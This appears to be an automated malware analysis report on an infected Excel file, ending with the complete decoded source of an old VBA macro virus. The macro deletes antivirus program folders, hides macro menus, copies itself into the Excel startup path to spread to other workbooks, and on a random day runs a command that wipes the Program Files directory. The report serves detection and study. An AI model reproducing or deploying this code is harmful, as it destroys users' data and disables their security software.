MALICIOUS
280
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
T1027 Obfuscated Files or Information
The Auto_Open VBA macro executes upon opening the document. It attempts to delete common antivirus software installations and then copies itself to the Excel startup path as 'EXCEL.XLA' to achieve persistence. The macro also contains obfuscation techniques and calls to unknown functions like 'Enigma' and 'CHG', suggesting a malicious intent to evade detection and maintain control.
Heuristics 5
-
ClamAV: Xls.Trojan.Trasher-4 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Trojan.Trasher-4
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2682 bytes |
SHA-256: 2e862e1cb278d2d561594800170ea4d9feca8f5446c31121b85d48b1d60a018b |
|||
|
Detection
ClamAV:
Xls.Trojan.Trasher-4
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Sheet3"
Sub Auto_Open()
Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14"
On Error Resume Next
Application.ScreenUpdating = False
Application.DisplayAlerts = False
Kill "C:\Program Files\AntiViral Toolkit Pro\*.*"
MenuBars(xlWorksheet).Menus("Tools").MenuItems("&Macro...").Delete
Kill "C:\Program Files\FindVirus\*.*"
MenuBars(xlModule).Menus("Tools").MenuItems("&Macro...").Delete
Kill "C:\f-macro\*.*"
MenuBars(xlNoDocuments).Menus("Tools").MenuItems("&Macro...").Delete
Kill "C:\Program Files\Command Software\F-PROT95\*.*"
MenuBars(xlInfo).Menus("Tools").MenuItems("&Macro...").Delete
Kill "C:\Program Files\McAfee\VirusScan\*.*"
MenuBars(xlChart).Menus("Tools").MenuItems("&Macro...").Delete
Kill "C:\Program Files\Norton AntiVirus\*.*"
Call Enigma
If CHG() Then
GoTo EBU:
Else
Call ING
End If
EBU:
Application.OnSheetActivate = "EXCEL.XLA!DIB"
End2:
End Sub
Function CHG() As Boolean
Attribute CHG.VB_ProcData.VB_Invoke_Func = " \n14"
CHG = False
For q = 1 To Application.Workbooks.Count
If Application.Workbooks(q).Name = "EXCEL.XLA" Then
For u = 1 To Application.Workbooks("EXCEL.XLA").Modules.Count
If Application.Workbooks("EXCEL.XLA").Modules(u).Name = "Sheet3" Then
CHG = True
End If
Next u
End If
Next q
End Function
Function ING()
Attribute ING.VB_ProcData.VB_Invoke_Func = " \n14"
ab = ActiveWorkbook.Name
Workbooks(ab).SaveCopyAs Application.StartupPath + "\EXCEL.XLA"
Workbooks.Open (Application.StartupPath + "\EXCEL.XLA")
Windows("EXCEL.XLA").Visible = False
Application.Workbooks("EXCEL.XLA").Save
End Function
Function ADI() As Boolean
Attribute ADI.VB_ProcData.VB_Invoke_Func = " \n14"
ac = ActiveWorkbook.Name
ADI = False
For y = 1 To Application.Workbooks(ac).Modules.Count
If Application.Workbooks(ac).Modules(y).Name = "Sheet3" Then
ADI = True
End If
Next y
End Function
Sub DIB()
Attribute DIB.VB_ProcData.VB_Invoke_Func = " \n14"
ad = ActiveWorkbook.Name
If ADI() Then
GoTo KI
End If
Application.ScreenUpdating = False
Application.Windows("EXCEL.XLA").Visible = True
Workbooks("EXCEL.XLA").Activate
Sheets("Sheet3").Visible = True
Workbooks("EXCEL.XLA").Sheets("Sheet3").Copy Before:=Workbooks(ad).Sheets(1)
Workbooks(ad).Sheets("Sheet3").Visible = False
Workbooks("EXCEL.XLA").Sheets("Sheet3").Visible = False
Windows("EXCEL.XLA").Visible = False
KI:
Close
End Sub
Sub Enigma()
Attribute Enigma.VB_ProcData.VB_Invoke_Func = " \n14"
On Error Resume Next
If Day(Now()) = Int((31 * Rnd) + 1) Then
Shell ("Deltree /y C:\Progra~1")
Do
MsgBox "Your computer is infected XM.Enigma virus by ULTRAS", 16, "ULTRAS"
Loop
End If
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.